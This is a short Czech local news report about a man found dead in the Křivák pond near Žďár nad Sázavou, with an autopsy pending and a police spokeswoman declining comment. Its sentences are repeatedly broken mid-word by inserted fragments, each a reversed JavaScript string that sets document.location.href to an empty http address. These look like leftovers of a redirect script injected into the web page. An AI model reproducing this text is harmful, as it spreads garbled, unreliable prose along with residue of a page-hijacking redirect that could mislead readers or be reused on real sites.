Rainbow page separator

Okolnosti smrti muže nalezeného v rybníku Křivák objasní pitva

Čtvrtek, 1. června 2017

Žďár nad Sázavou / Jak zemřel muž, jehož ve středu odpoledne nalezli náhodní kolemjdoucí ve vodě žďárského Křivého rybníka zvaného Křivák, zatím není známo. Objasnit [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to má nařízená pitva. Na místě nálezu zasahovali také policejní potápěči a členové hasičského záchranného sboru.
Policisté okolnosti mužovy smrti dále prověřují a v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to fázi zatím nechtějí podávat podrobnější informace. „Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že probíhá prověřování, nebudeme k případu posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat žádné další informace,“ potvrdila policejní mluvčí Stanislava Miláčková.
Okolí Křivého rybníka lidé čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to využívají k vycházkám, v jeho blízkosti vede rovněž turistická značka spojující Žďár s nedalekým Matějovem a naučná stezka Babín.